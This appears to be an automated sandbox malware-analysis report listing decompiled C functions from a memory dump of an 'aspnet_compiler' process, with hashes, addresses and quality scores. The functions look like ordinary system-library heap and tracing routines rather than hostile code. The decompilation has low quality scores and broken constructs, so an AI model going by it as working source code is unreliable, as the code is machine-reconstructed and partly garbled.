                                                                                        0x0122feb9
                                                                                        0x0122fec3
                                                                                        0x0122fed5
                                                                                        0x0122fec5
                                                                                        0x0122fece
                                                                                        0x0122fece
                                                                                        0x0122fee0
                                                                                        0x0122fee1
                                                                                        0x0122fee3
                                                                                        0x0122fee8
                                                                                        0x0122fefb

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ac322c4c376baae96792f766ddf91d20dd97da95e0524ac192e951db082c2581
                                                                                        • Instruction ID: ad61f0902607c3cc48f162f2e845d38c87495f6e7dc54e957dac735065af2b6d
                                                                                        • Opcode Fuzzy Hash: ac322c4c376baae96792f766ddf91d20dd97da95e0524ac192e951db082c2581
                                                                                        • Instruction Fuzzy Hash: 97016D71A0421DAFCB14DFA8D546A6EBBF4EF08704F1041A9F905EB382DA35EA01CB80
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125131B Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 48%
                                                                                        			E0125131B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x128d360 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E011B7D50() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                        0x0125131b
                                                                                        0x0125132a
                                                                                        0x01251330
                                                                                        0x01251336
                                                                                        0x0125133e
                                                                                        0x01251341
                                                                                        0x01251344
                                                                                        0x0125134f
                                                                                        0x01251361
                                                                                        0x01251351
                                                                                        0x0125135a
                                                                                        0x0125135a
                                                                                        0x0125136c
                                                                                        0x0125136d
                                                                                        0x0125136f
                                                                                        0x01251374
                                                                                        0x01251387

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: c8d6e7922eb2b87ae18f6a60d26d6a9453b6a722c13fa7015f5e7718197c9259
                                                                                        • Instruction ID: b650917f4dee8d6a4b763aa6c00e5907a407f228267099949e5312df8c02f408
                                                                                        • Opcode Fuzzy Hash: c8d6e7922eb2b87ae18f6a60d26d6a9453b6a722c13fa7015f5e7718197c9259
                                                                                        • Instruction Fuzzy Hash: 50011971A0520DAFCB44EFA9D545AAEB7F4EF58700F004069F905EB381E6749A10CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01268F6A Relevance: .0, Instructions: 36COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 48%
                                                                                        			E01268F6A(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x128d360 ^ _t32;
				_v16 = __ecx;
				_v50 = 0x1c2c;
				_v24 = _a4;
				_v20 = _a8;
				_v12 = __edx;
				if(E011B7D50() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}















                                                                                        0x01268f6a
                                                                                        0x01268f79
                                                                                        0x01268f81
                                                                                        0x01268f84
                                                                                        0x01268f8b
                                                                                        0x01268f91
                                                                                        0x01268f94
                                                                                        0x01268f9e
                                                                                        0x01268fb0
                                                                                        0x01268fa0
                                                                                        0x01268fa9
                                                                                        0x01268fa9
                                                                                        0x01268fbb
                                                                                        0x01268fbc
                                                                                        0x01268fbe
                                                                                        0x01268fc3
                                                                                        0x01268fd6

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f88c6c445aba1cbe9221ebec68dc779a92457a4cdf7caacda2627d65aa9dd770
                                                                                        • Instruction ID: 16aef67f5bba5aa86147f689ee016a7075fcf7f6920663fba39738ee92d5bd74
                                                                                        • Opcode Fuzzy Hash: f88c6c445aba1cbe9221ebec68dc779a92457a4cdf7caacda2627d65aa9dd770
                                                                                        • Instruction Fuzzy Hash: 46014F75A0520DAFDB04EFA8D545AAEB7F4EF58304F504459F905EB381EB74DA00CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01251608 Relevance: .0, Instructions: 34COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 46%
                                                                                        			E01251608(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_t26 = __edx;
				_v8 =  *0x128d360 ^ _t29;
				_v12 = _a4;
				_v20 = __ecx;
				_v16 = __edx;
				_v46 = 0x1024;
				if(E011B7D50() == 0) {
					_t15 = 0x7ffe0380;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v52);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t21, _v8 ^ _t29, _t26, _t27, _t28);
			}














                                                                                        0x01251608
                                                                                        0x01251617
                                                                                        0x0125161d
                                                                                        0x01251625
                                                                                        0x01251628
                                                                                        0x0125162b
                                                                                        0x01251636
                                                                                        0x01251648
                                                                                        0x01251638
                                                                                        0x01251641
                                                                                        0x01251641
                                                                                        0x01251653
                                                                                        0x01251654
                                                                                        0x01251656
                                                                                        0x0125165b
                                                                                        0x0125166e

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: da11c57de0d715c7cb558f79ef768c22a3300d1d7f6eee8fb423026476505906
                                                                                        • Instruction ID: cf360d59ca241c9be392fece890dcf402c767f1a712b6e98c30dc91c3cefb949
                                                                                        • Opcode Fuzzy Hash: da11c57de0d715c7cb558f79ef768c22a3300d1d7f6eee8fb423026476505906
                                                                                        • Instruction Fuzzy Hash: E0F06D71A1525DEFDB14EFA8D486EAEBBF4EF18300F044069E905EB381EA749900CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011BC577 Relevance: .0, Instructions: 33COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E011BC577(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E011BC5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x11711cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					__eflags = _a4;
					if(__eflags != 0) {
						L10:
						E012688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags == 0) {
						goto L10;
					}
					goto L9;
				} else {
					return 1;
				}
			}









                                                                                        0x011bc577
                                                                                        0x011bc57d
                                                                                        0x011bc581
                                                                                        0x011bc5b5
                                                                                        0x011bc5b9
                                                                                        0x011bc5ce
                                                                                        0x011bc5ce
                                                                                        0x011bc5ca
                                                                                        0x00000000
                                                                                        0x011bc5ca
                                                                                        0x011bc5c4
                                                                                        0x011bc5c8
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011bc5ad
                                                                                        0x00000000
                                                                                        0x011bc5af

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 982686b5d470e9b26866a757cd666fd046b81a9c12d40a0180744128a9f5792b
                                                                                        • Instruction ID: f4c37a738cbe3a2bf55f15c10fe229edc2cf69af99f003b25a98526efee72946
                                                                                        • Opcode Fuzzy Hash: 982686b5d470e9b26866a757cd666fd046b81a9c12d40a0180744128a9f5792b
                                                                                        • Instruction Fuzzy Hash: F0F0BEB2B257949FE73ECB2CC0C4BA27FE89B05670F458567D606C7242C7A4D880CAD1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01252073 Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E01252073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
				void* __esi;
				signed char _t3;
				signed char _t7;
				void* _t19;

				_t17 = __ecx;
				_t3 = E0124FD22(__ecx);
				_t19 =  *0x128849c - _t3; // 0x0
				if(_t19 == 0) {
					__eflags = _t17 -  *0x1288748; // 0x0
					if(__eflags <= 0) {
						E01251C06();
						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
						__eflags = _t3;
						if(_t3 != 0) {
							L5:
							__eflags =  *0x1288724 & 0x00000004;
							if(( *0x1288724 & 0x00000004) == 0) {
								asm("int3");
								return _t3;
							}
						} else {
							_t3 =  *0x7ffe02d4 & 0x00000003;
							__eflags = _t3 - 3;
							if(_t3 == 3) {
								goto L5;
							}
						}
					}
					return _t3;
				} else {
					_t7 =  *0x1288724; // 0x0
					return E01248DF1(__ebx, 0xc0000374, 0x1285890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
				}
			}







                                                                                        0x01252076
                                                                                        0x01252078
                                                                                        0x0125207d
                                                                                        0x01252083
                                                                                        0x012520a4
                                                                                        0x012520aa
                                                                                        0x012520ac
                                                                                        0x012520b7
                                                                                        0x012520ba
                                                                                        0x012520bc
                                                                                        0x012520c9
                                                                                        0x012520c9
                                                                                        0x012520d0
                                                                                        0x012520d2
                                                                                        0x00000000
                                                                                        0x012520d2
                                                                                        0x012520be
                                                                                        0x012520c3
                                                                                        0x012520c5
                                                                                        0x012520c7
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x012520c7
                                                                                        0x012520bc
                                                                                        0x012520d4
                                                                                        0x01252085
                                                                                        0x01252085
                                                                                        0x012520a3
                                                                                        0x012520a3

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 22b22457ae54454c2f86bdaff8b031ebaf3f7362d61c04e57448bdf843f0c956
                                                                                        • Instruction ID: 246d85869a446bd7e685d4b2806a45ca7ed5804e01463b1477c44d617ad033bb
                                                                                        • Opcode Fuzzy Hash: 22b22457ae54454c2f86bdaff8b031ebaf3f7362d61c04e57448bdf843f0c956
                                                                                        • Instruction Fuzzy Hash: 4DF0272A433186CBDFBA6B2C31843E53B91D765110F490445DE9017245C5358893CB11
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011D927A Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 54%
                                                                                        			E011D927A(void* __ecx) {
				signed int _t11;
				void* _t14;

				_t11 = L011B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
				if(_t11 != 0) {
					E011DFA60(_t11, 0, 0x98);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
					 *((intOrPtr*)(_t11 + 0x24)) = 1;
					E011D92C6(_t11, _t14);
				}
				return _t11;
			}





                                                                                        0x011d9295
                                                                                        0x011d9299
                                                                                        0x011d929f
                                                                                        0x011d92aa
                                                                                        0x011d92ad
                                                                                        0x011d92ae
                                                                                        0x011d92af
                                                                                        0x011d92b0
                                                                                        0x011d92b4
                                                                                        0x011d92bb
                                                                                        0x011d92bb
                                                                                        0x011d92c5

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                        • Instruction ID: afac8c39089ab71924b792bfa7c3dc79951712977a1d891c6eec564fa98e32ac
                                                                                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                                                                        • Instruction Fuzzy Hash: F1E02232340A416BE7259E4ACCC0F4337ADEFD2728F044078F9001E282CBE6DD0987A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01268D34 Relevance: .0, Instructions: 32COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 43%
                                                                                        			E01268D34(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr _t24;
				intOrPtr _t25;
				signed int _t26;

				_t23 = __edx;
				_v8 =  *0x128d360 ^ _t26;
				_v16 = __ecx;
				_v42 = 0x1c2b;
				_v12 = __edx;
				if(E011B7D50() == 0) {
					_t12 = 0x7ffe0386;
				} else {
					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t12 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
			}













                                                                                        0x01268d34
                                                                                        0x01268d43
                                                                                        0x01268d4b
                                                                                        0x01268d4e
                                                                                        0x01268d52
                                                                                        0x01268d5c
                                                                                        0x01268d6e
                                                                                        0x01268d5e
                                                                                        0x01268d67
                                                                                        0x01268d67
                                                                                        0x01268d79
                                                                                        0x01268d7a
                                                                                        0x01268d7c
                                                                                        0x01268d81
                                                                                        0x01268d94

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 380f928ebea1b81da8d81bf0d81fd07adcad1e3f82fbbac4ecec6e6e96ac43bf
                                                                                        • Instruction ID: cd8da883ceee752fe96faf169abc683d869bc344ef6bf244072abb60c645d72d
                                                                                        • Opcode Fuzzy Hash: 380f928ebea1b81da8d81bf0d81fd07adcad1e3f82fbbac4ecec6e6e96ac43bf
                                                                                        • Instruction Fuzzy Hash: C0F0B470A1470D9FDB18EFB8D445A6E77B8EF24304F108099E905EB2C1DA34D900CB54
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01268B58 Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 36%
                                                                                        			E01268B58(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v20;
				short _v46;
				char _v52;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x128d360 ^ _t25;
				_v20 = __ecx;
				_v46 = 0x1c26;
				if(E011B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v52);
				_push(4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                        0x01268b67
                                                                                        0x01268b6f
                                                                                        0x01268b72
                                                                                        0x01268b7d
                                                                                        0x01268b8f
                                                                                        0x01268b7f
                                                                                        0x01268b88
                                                                                        0x01268b88
                                                                                        0x01268b9a
                                                                                        0x01268b9b
                                                                                        0x01268b9d
                                                                                        0x01268ba2
                                                                                        0x01268bb5

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 3425d5c5f19681bd6887f13673a0b365ef97f302bf606141066aed7503dd6684
                                                                                        • Instruction ID: cd035cab7150a18f9d67bbf4ea99bd8c6e3217c6c48f10009ec1b88221c4dada
                                                                                        • Opcode Fuzzy Hash: 3425d5c5f19681bd6887f13673a0b365ef97f302bf606141066aed7503dd6684
                                                                                        • Instruction Fuzzy Hash: 69F082B1A1425DABDB14EBA8E906E6E77B8EF04304F040459FA05DB3C1FB74D900C798
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011B746D Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 88%
                                                                                        			E011B746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
				signed int _t8;
				void* _t10;
				short* _t17;
				void* _t19;
				intOrPtr _t20;
				void* _t21;

				_t20 = __esi;
				_t19 = __edi;
				_t17 = __ebx;
				if( *((char*)(_t21 - 0x25)) != 0) {
					if(__ecx == 0) {
						E011AEB70(__ecx, 0x12879a0);
					} else {
						asm("lock xadd [ecx], eax");
						if((_t8 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(__ecx + 4)));
							E011D95D0();
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
						}
					}
					L10:
				}
				_t10 = _t19 + _t19;
				if(_t20 >= _t10) {
					if(_t19 != 0) {
						 *_t17 = 0;
						return 0;
					}
				}
				return _t10;
				goto L10;
			}









                                                                                        0x011b746d
                                                                                        0x011b746d
                                                                                        0x011b746d
                                                                                        0x011b7471
                                                                                        0x011b7488
                                                                                        0x011ff92d
                                                                                        0x011b748e
                                                                                        0x011b7491
                                                                                        0x011b7495
                                                                                        0x011ff937
                                                                                        0x011ff93a
                                                                                        0x011ff94e
                                                                                        0x011ff953
                                                                                        0x011ff956
                                                                                        0x011ff956
                                                                                        0x011b7495
                                                                                        0x00000000
                                                                                        0x011b7488
                                                                                        0x011b7473
                                                                                        0x011b7478
                                                                                        0x011b747d
                                                                                        0x011b7481
                                                                                        0x00000000
                                                                                        0x011b7481
                                                                                        0x011b747d
                                                                                        0x011b747a
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 814f34ffc43c0b94af7cfd750bd8d74413d4d8dbd49050526623912d0145118d
                                                                                        • Instruction ID: c482e5d9480bae996a44ff70e489665b573659261ec5e7798204de796f1cb9d2
                                                                                        • Opcode Fuzzy Hash: 814f34ffc43c0b94af7cfd750bd8d74413d4d8dbd49050526623912d0145118d
                                                                                        • Instruction Fuzzy Hash: C3F0E235A05146AADF0EAB6CC8C0BF9FFB1BF84216F450259E951AB1E1E76C9801C786
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01268CD6 Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 36%
                                                                                        			E01268CD6(intOrPtr __ecx) {
				signed int _v8;
				intOrPtr _v12;
				short _v38;
				char _v44;
				signed char* _t11;
				intOrPtr _t17;
				intOrPtr _t22;
				intOrPtr _t23;
				intOrPtr _t24;
				signed int _t25;

				_v8 =  *0x128d360 ^ _t25;
				_v12 = __ecx;
				_v38 = 0x1c2d;
				if(E011B7D50() == 0) {
					_t11 = 0x7ffe0386;
				} else {
					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v44);
				_push(0xffffffe4);
				_push(0x402);
				_push( *_t11 & 0x000000ff);
				return E011DB640(E011D9AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
			}













                                                                                        0x01268ce5
                                                                                        0x01268ced
                                                                                        0x01268cf0
                                                                                        0x01268cfb
                                                                                        0x01268d0d
                                                                                        0x01268cfd
                                                                                        0x01268d06
                                                                                        0x01268d06
                                                                                        0x01268d18
                                                                                        0x01268d19
                                                                                        0x01268d1b
                                                                                        0x01268d20
                                                                                        0x01268d33

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 9d9b8a9159cc0021cceb70587cab24f23447a9ca2d4cbb0206aaa4b14764798c
                                                                                        • Instruction ID: 81f6dc8b0d3e20f146c115686faf52d308569fbce836a7310fba8c72a53bdb49
                                                                                        • Opcode Fuzzy Hash: 9d9b8a9159cc0021cceb70587cab24f23447a9ca2d4cbb0206aaa4b14764798c
                                                                                        • Instruction Fuzzy Hash: D2F08271A1524DABDB04DBB8E946EAE77B8EF69204F100199E916EB2C1EA34D900C754
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 01194F2E Relevance: .0, Instructions: 31COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E01194F2E(void* __ecx, char _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0) {
					L6:
					__eflags = _a4;
					if(__eflags != 0) {
						L8:
						E012688F5(_t17, _t18, _t19, _t20, _t21, __eflags);
						L9:
						return 0;
					}
					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
					if(__eflags != 0) {
						goto L9;
					}
					goto L8;
				}
				_t18 = __ecx + 0x30;
				if(E011BC5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x1171030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					goto L6;
				} else {
					return 1;
				}
			}









                                                                                        0x01194f2e
                                                                                        0x01194f34
                                                                                        0x01194f38
                                                                                        0x011f0b85
                                                                                        0x011f0b85
                                                                                        0x011f0b89
                                                                                        0x011f0b9a
                                                                                        0x011f0b9a
                                                                                        0x011f0b9f
                                                                                        0x00000000
                                                                                        0x011f0b9f
                                                                                        0x011f0b94
                                                                                        0x011f0b98
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011f0b98
                                                                                        0x01194f3e
                                                                                        0x01194f48
                                                                                        0x00000000
                                                                                        0x01194f6e
                                                                                        0x00000000
                                                                                        0x01194f70

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 8a7e0b74fcd265e1ce29c28f241fdb7eb249a441d6eb20d057e651e84104c3fb
                                                                                        • Instruction ID: a6569809865b8239e4e810d299f862698b77190934681c10c8784bbeba411b65
                                                                                        • Opcode Fuzzy Hash: 8a7e0b74fcd265e1ce29c28f241fdb7eb249a441d6eb20d057e651e84104c3fb
